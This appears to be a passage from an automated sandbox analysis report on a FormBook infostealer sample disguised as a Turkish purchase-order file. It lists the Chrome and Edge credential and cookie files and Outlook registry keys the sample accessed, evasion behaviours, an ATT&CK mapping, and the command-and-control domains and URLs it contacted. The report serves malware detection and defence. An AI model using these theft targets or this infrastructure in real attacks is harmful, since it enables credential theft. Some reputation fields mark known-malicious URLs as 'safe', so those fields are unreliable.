            Source: Yara matchFile source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\unregmp2.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466660 Sample: Fiyat ARH-4309745275.pdf240... Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 39 www.evertudy.xyz 2->39 41 xiaoyue.zhuangkou.com 2->41 43 19 other IPs or domains 2->43 53 Snort IDS alert for network traffic 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Multi AV Scanner detection for submitted file 2->57 61 7 other signatures 2->61 10 Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe 4 2->10         started        signatures3 59 Performs DNS queries to domains with low reputation 39->59 process4 file5 37 Fiyat ARH-43097452...13u40000876.exe.log, ASCII 10->37 dropped 65 Adds a directory exclusion to Windows Defender 10->65 67 Injects a PE file into a foreign processes 10->67 14 Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe 10->14         started        17 powershell.exe 7 10->17         started        19 Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe 10->19         started        21 Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe 10->21         started        signatures6 process7 signatures8 77 Maps a DLL or memory area into another process 14->77 23 owYCvHvzfwuh.exe 14->23 injected 26 conhost.exe 17->26         started        process9 signatures10 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 28 unregmp2.exe 13 23->28         started        process11 signatures12 69 Tries to steal Mail credentials (via file / registry access) 28->69 71 Tries to harvest and steal browser information (history, passwords, etc) 28->71 73 Modifies the context of a thread in another process (thread injection) 28->73 75 3 other signatures 28->75 31 owYCvHvzfwuh.exe 28->31 injected 35 firefox.exe 28->35         started        process13 dnsIp14 45 www.evertudy.xyz 203.161.49.220, 49735, 49736, 49737 VNPT-AS-VNVNPTCorpVN Malaysia 31->45 47 parkingpage.namecheap.com 91.195.240.19, 49719, 49720, 49721 SEDO-ASDE Germany 31->47 49 8 other IPs or domains 31->49 51 Found direct / indirect Syscall (likely to bypass EDR) 31->51 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe61%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe61%VirustotalBrowse
            Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            mocar.pro1%VirustotalBrowse
            www.highwavesmarine.com0%VirustotalBrowse
            www.thesprinklesontop.com0%VirustotalBrowse
            parkingpage.namecheap.com0%VirustotalBrowse
            www.ennerdaledevcons.co.uk1%VirustotalBrowse
            dxgsf.shop2%VirustotalBrowse
            www.shoplifestylebrand.com0%VirustotalBrowse
            www.luo918.com0%VirustotalBrowse
            www.fungusbus.com1%VirustotalBrowse
            xiaoyue.zhuangkou.com0%VirustotalBrowse
            stefanogaus.com1%VirustotalBrowse
            www.dennisrosenberg.studio0%VirustotalBrowse
            www.newzionocala.com0%VirustotalBrowse
            www.evertudy.xyz2%VirustotalBrowse
            www.mocar.pro1%VirustotalBrowse
            www.artemhypnotherapy.com1%VirustotalBrowse
            www.stefanogaus.com1%VirustotalBrowse
            www.neworldelectronic.com1%VirustotalBrowse
            www.dxgsf.shop2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://www.evertudy.xyz/csr7/0%Avira URL Cloudsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%VirustotalBrowse
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://www.dxgsf.shop0%Avira URL Cloudsafe
            http://www.thesprinklesontop.com/Easy_Ice_Cream_Recipes.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%2FJW0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%VirustotalBrowse
            http://www.thesprinklesontop.com/Nutella_Ice_Cream_Recipe.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%2F0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%VirustotalBrowse
            http://www.ennerdaledevcons.co.uk/4ksh/?hH=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK+Sf67ndIbG8DedkN4mAzPYnwe388RaOdlDVpfeljRUUit0IJ1LO15UdugXJNJJasE4A==&4Z=FRPPB0TP0VK82R40%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/28903/search.png)0%Avira URL Cloudsafe
            https://cdn.consentmanager.net0%Avira URL Cloudsafe
            http://www.dxgsf.shop2%VirustotalBrowse
            https://track.uc.cn/collect0%Avira URL Cloudsafe
            https://www.ennerdaledevcons.co.uk/4ksh/?hH=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/28903/search.png)0%VirustotalBrowse
            http://www.highwavesmarine.com/vpfr/?4Z=FRPPB0TP0VK82R4&hH=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQu0h2rMKukEsZCuMbbpIHNAKNxYQHAA==0%Avira URL Cloudsafe
            https://track.uc.cn/collect0%VirustotalBrowse
            http://www.thesprinklesontop.com/n12h/?hH=RL7POCi4RQwOAHw5RpRi0oRkNrFJHCE4O3Q4e5XJ1RgvJteO2OLpaAwWvE/Xee8N43HhgIeZk31xLdwZ5MBNlQw99SDhk98goSWR9PKXD7QtbF+D/w==&4Z=FRPPB0TP0VK82R40%Avira URL Cloudsafe
            http://mocar.pro/prg5/?hH=OUWlBSduFOmbWHHx10%Avira URL Cloudsafe
            http://www.thesprinklesontop.com/__media__/js/trademark.php?d=thesprinklesontop.com&type=ns0%Avira URL Cloudsafe
            https://cdn.consentmanager.net0%VirustotalBrowse
            http://www.artemhypnotherapy.com/9285/0%Avira URL Cloudsafe
            http://www.qe1jqiste.sbs/2dv8/?hH=psGgeTZm92uMMjwvw3+ekktQKHQr8PtkyzA1wjnO7+NPXjQAxvdC6xrXVCGmGkxqQ5F0SN4BIMC+q/QNsQX26bwEMBx8euROh9Q+/yWsNbYiwZzEkA==&4Z=FRPPB0TP0VK82R40%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg0%Avira URL Cloudsafe
            http://www.stefanogaus.com/0rsk/0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%VirustotalBrowse
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%Avira URL Cloudsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
            http://www.dxgsf.shop/vfca/?hH=PjuNaM4rErgNDqYdGwCHqm/mvS3xhxVRtMFmVQvGZApPshrl2us8sSNvZzeSfqXaMpgL6dVjOwb89B84ObwJ1CB2sMjpnb8Z8ua1HdSGi7DVkOqV+A==&4Z=FRPPB0TP0VK82R40%Avira URL Cloudsafe
            https://delivery.consentmanager.net0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%Avira URL Cloudsafe
            http://www.thesprinklesontop.com/__media__/design/underconstructionnotice.php?d=thesprinklesontop.co0%Avira URL Cloudsafe
            http://www.Thesprinklesontop.com0%Avira URL Cloudsafe
            http://www.dennisrosenberg.studio/gvk0/?4Z=FRPPB0TP0VK82R4&hH=PBk/k+wnSgDApBLvvStJ1Qfqn2+N7jbU3UJKISJwHJXOTy3qrqzF3aeAlE7aotAu8uhq4eiBm9zMPuEZ1b+PfRrn1v/W9n6lJorEOJ3pO998ixm+1g==0%Avira URL Cloudsafe
            http://www.qe1jqiste.sbs/2dv8/0%Avira URL Cloudsafe
            https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark0%Avira URL Cloudsafe
            http://www.stefanogaus.com/0rsk/?hH=VoD++N0hxznoRAwvUr4uLQfJYOkKZkNbUm2XKd+d5dQonHhfXy1Wde6i6X/1IJHjaG3HR8hpE35h9XRxGXBI9lLHHMR3rtgWi8G/40reX/Z08eN34A==&4Z=FRPPB0TP0VK82R40%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
            http://stefanogaus.com/0rsk/?hH=VoD0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
            http://www.luo918.com/qmv1/?hH=70iXdBj3vvgYA1qv9X+C2v5f15BZXYNXgOSbaBLZsvX+/zBEWaSfpSSmWx4BVFALB6Pvk4Cj2RW76gyU8dG7au3WOdqnwjndnKZaLflLsZKJNqTutg==&4Z=FRPPB0TP0VK82R40%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
            http://www.mocar.pro/prg5/?hH=OUWlBSduFOmbWHHx1+vrCN7lKThtnpeA9WltEIwOsC9+Rnf1YsqGBMTu+SXEa1SqJjg2e+xS43eh4+WwnjHBZw687TI9hNY/lW63YeurSsH96+kXOg==&4Z=FRPPB0TP0VK82R40%Avira URL Cloudsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg0%Avira URL Cloudsafe
            http://www.evertudy.xyz/csr7/?hH=IuYwVr8nXepE7mYHSf+gGVghE+QsK0Y2QdUzXudSXEAptekBSDag4n7LIWAgnje27+AV9TSqmFigDMavfH+dGRiAFdG+fcQhNs0c0ksUo3k2Pm5jlw==&4Z=FRPPB0TP0VK82R40%Avira URL Cloudsafe
            http://www.luo918.com/qmv1/0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
            http://www.thesprinklesontop.com/Ninja_Ice_Cream_Recipes.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%2FJ0%Avira URL Cloudsafe
            http://www.dxgsf.shop/vfca/0%Avira URL Cloudsafe
            http://www.mocar.pro/prg5/0%Avira URL Cloudsafe
            http://www.ennerdaledevcons.co.uk/4ksh/0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
            http://www.thesprinklesontop.com/Recipe_for_Fried_Ice_Cream.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%0%Avira URL Cloudsafe
            http://www.fungusbus.com/dmjt/0%Avira URL Cloudsafe
            http://www.thesprinklesontop.com/n12h/0%Avira URL Cloudsafe
            http://www.dennisrosenberg.studio/gvk0/0%Avira URL Cloudsafe
            http://www.fungusbus.com/dmjt/?hH=phzqshWM8++lNTZcZDn6PlPBsxjNAhN5IKmoEk/tfOScWWQLgCWtTff73plV+RjstliAOCijSwUPjuCIutjnDtcmXgVOIWaf4rR9wPyv60N+q1PahQ==&4Z=FRPPB0TP0VK82R40%Avira URL Cloudsafe
            http://www.thesprinklesontop.com/Quick_Chocolate_Ice_Cream_Recipe.cfm?fp=M%2BtyRdDSGaZA523flChCSac4t0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            mocar.pro
            		109.95.158.122
            		truetrueunknown
            www.highwavesmarine.com
            		23.111.180.146
            		truetrueunknown
            www.thesprinklesontop.com
            		208.91.197.27
            		truetrueunknown
            parkingpage.namecheap.com
            		91.195.240.19
            		truetrueunknown
            www.ennerdaledevcons.co.uk
            		212.227.172.254
            		truetrueunknown
            dxgsf.shop
            		103.197.25.241
            		truetrueunknown
            stefanogaus.com
            		66.235.200.146
            		truetrueunknown
            www.luo918.com
            		35.227.248.111
            		truefalseunknown
            xiaoyue.zhuangkou.com
            		47.239.13.172
            		truetrueunknown
            www.evertudy.xyz
            		203.161.49.220
            		truetrueunknown
            www.fungusbus.com
            		unknown
            		unknowntrueunknown
            www.newzionocala.com
            		unknown
            		unknowntrueunknown
            www.dennisrosenberg.studio
            		unknown
            		unknowntrueunknown
            www.shoplifestylebrand.com
            		unknown
            		unknowntrueunknown
            www.qe1jqiste.sbs
            		unknown
            		unknowntrue
              		unknown
              www.mocar.pro
              		unknown
              		unknowntrueunknown
              www.dxgsf.shop
              		unknown
              		unknowntrueunknown
              www.neworldelectronic.com
              		unknown
              		unknowntrueunknown
              www.stefanogaus.com
              		unknown
              		unknowntrueunknown
              www.artemhypnotherapy.com
              		unknown
              		unknowntrueunknown
              www.todosneaker.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.evertudy.xyz/csr7/true
                • Avira URL Cloud: safe
                		unknown
                http://www.ennerdaledevcons.co.uk/4ksh/?hH=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK+Sf67ndIbG8DedkN4mAzPYnwe388RaOdlDVpfeljRUUit0IJ1LO15UdugXJNJJasE4A==&4Z=FRPPB0TP0VK82R4true
                • Avira URL Cloud: safe
                		unknown
                http://www.highwavesmarine.com/vpfr/?4Z=FRPPB0TP0VK82R4&hH=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQu0h2rMKukEsZCuMbbpIHNAKNxYQHAA==true
                • Avira URL Cloud: safe
                		unknown
                http://www.thesprinklesontop.com/n12h/?hH=RL7POCi4RQwOAHw5RpRi0oRkNrFJHCE4O3Q4e5XJ1RgvJteO2OLpaAwWvE/Xee8N43HhgIeZk31xLdwZ5MBNlQw99SDhk98goSWR9PKXD7QtbF+D/w==&4Z=FRPPB0TP0VK82R4true
                • Avira URL Cloud: safe
                		unknown
                http://www.artemhypnotherapy.com/9285/true
                • Avira URL Cloud: safe
                		unknown
                http://www.qe1jqiste.sbs/2dv8/?hH=psGgeTZm92uMMjwvw3+ekktQKHQr8PtkyzA1wjnO7+NPXjQAxvdC6xrXVCGmGkxqQ5F0SN4BIMC+q/QNsQX26bwEMBx8euROh9Q+/yWsNbYiwZzEkA==&4Z=FRPPB0TP0VK82R4true
                • Avira URL Cloud: safe
                		unknown
                http://www.stefanogaus.com/0rsk/true
                • Avira URL Cloud: safe
                		unknown
                http://www.dxgsf.shop/vfca/?hH=PjuNaM4rErgNDqYdGwCHqm/mvS3xhxVRtMFmVQvGZApPshrl2us8sSNvZzeSfqXaMpgL6dVjOwb89B84ObwJ1CB2sMjpnb8Z8ua1HdSGi7DVkOqV+A==&4Z=FRPPB0TP0VK82R4true
                • Avira URL Cloud: safe
                		unknown
                http://www.dennisrosenberg.studio/gvk0/?4Z=FRPPB0TP0VK82R4&hH=PBk/k+wnSgDApBLvvStJ1Qfqn2+N7jbU3UJKISJwHJXOTy3qrqzF3aeAlE7aotAu8uhq4eiBm9zMPuEZ1b+PfRrn1v/W9n6lJorEOJ3pO998ixm+1g==true
                • Avira URL Cloud: safe
                		unknown
                http://www.qe1jqiste.sbs/2dv8/true
                • Avira URL Cloud: safe
                		unknown
                http://www.stefanogaus.com/0rsk/?hH=VoD++N0hxznoRAwvUr4uLQfJYOkKZkNbUm2XKd+d5dQonHhfXy1Wde6i6X/1IJHjaG3HR8hpE35h9XRxGXBI9lLHHMR3rtgWi8G/40reX/Z08eN34A==&4Z=FRPPB0TP0VK82R4true
                • Avira URL Cloud: safe
                		unknown
                http://www.luo918.com/qmv1/?hH=70iXdBj3vvgYA1qv9X+C2v5f15BZXYNXgOSbaBLZsvX+/zBEWaSfpSSmWx4BVFALB6Pvk4Cj2RW76gyU8dG7au3WOdqnwjndnKZaLflLsZKJNqTutg==&4Z=FRPPB0TP0VK82R4false
                • Avira URL Cloud: safe
                		unknown
                http://www.mocar.pro/prg5/?hH=OUWlBSduFOmbWHHx1+vrCN7lKThtnpeA9WltEIwOsC9+Rnf1YsqGBMTu+SXEa1SqJjg2e+xS43eh4+WwnjHBZw687TI9hNY/lW63YeurSsH96+kXOg==&4Z=FRPPB0TP0VK82R4true
                • Avira URL Cloud: safe
                		unknown
                http://www.luo918.com/qmv1/false
                • Avira URL Cloud: safe
                		unknown
                http://www.evertudy.xyz/csr7/?hH=IuYwVr8nXepE7mYHSf+gGVghE+QsK0Y2QdUzXudSXEAptekBSDag4n7LIWAgnje27+AV9TSqmFigDMavfH+dGRiAFdG+fcQhNs0c0ksUo3k2Pm5jlw==&4Z=FRPPB0TP0VK82R4true
                • Avira URL Cloud: safe
                		unknown
                http://www.dxgsf.shop/vfca/true
                • Avira URL Cloud: safe
                		unknown
                http://www.mocar.pro/prg5/true
                • Avira URL Cloud: safe
                		unknown
                http://www.ennerdaledevcons.co.uk/4ksh/true
                • Avira URL Cloud: safe
                		unknown
                http://www.fungusbus.com/dmjt/true
                • Avira URL Cloud: safe
                		unknown
                http://www.thesprinklesontop.com/n12h/true
                • Avira URL Cloud: safe
                		unknown
                http://www.dennisrosenberg.studio/gvk0/true
                • Avira URL Cloud: safe
                		unknown
                http://www.fungusbus.com/dmjt/?hH=phzqshWM8++lNTZcZDn6PlPBsxjNAhN5IKmoEk/tfOScWWQLgCWtTff73plV+RjstliAOCijSwUPjuCIutjnDtcmXgVOIWaf4rR9wPyv60N+q1PahQ==&4Z=FRPPB0TP0VK82R4true
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabunregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsunregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffunregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/ac/?q=unregmp2.exe, 00000009.00000003.1725654999.0000000007FE8000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsunregmp2.exe, 00000009.00000002.3780666012.0000000006748000.00000004.10000000.00040000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000003D28000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.dxgsf.shopowYCvHvzfwuh.exe, 0000000D.00000002.3781878826.0000000004E2A000.00000040.80000000.00040000.00000000.sdmpfalse
                • 2%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.thesprinklesontop.com/Easy_Ice_Cream_Recipes.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%2FJWunregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.thesprinklesontop.com/Nutella_Ice_Cream_Recipe.cfm?fp=M%2BtyRdDSGaZA523flChCSac4thPJjG%2Funregmp2.exe, 00000009.00000002.3780666012.0000000006D90000.00000004.10000000.00040000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3782844702.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, owYCvHvzfwuh.exe, 0000000D.00000002.3779474445.0000000004370000.00000004.00000001.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
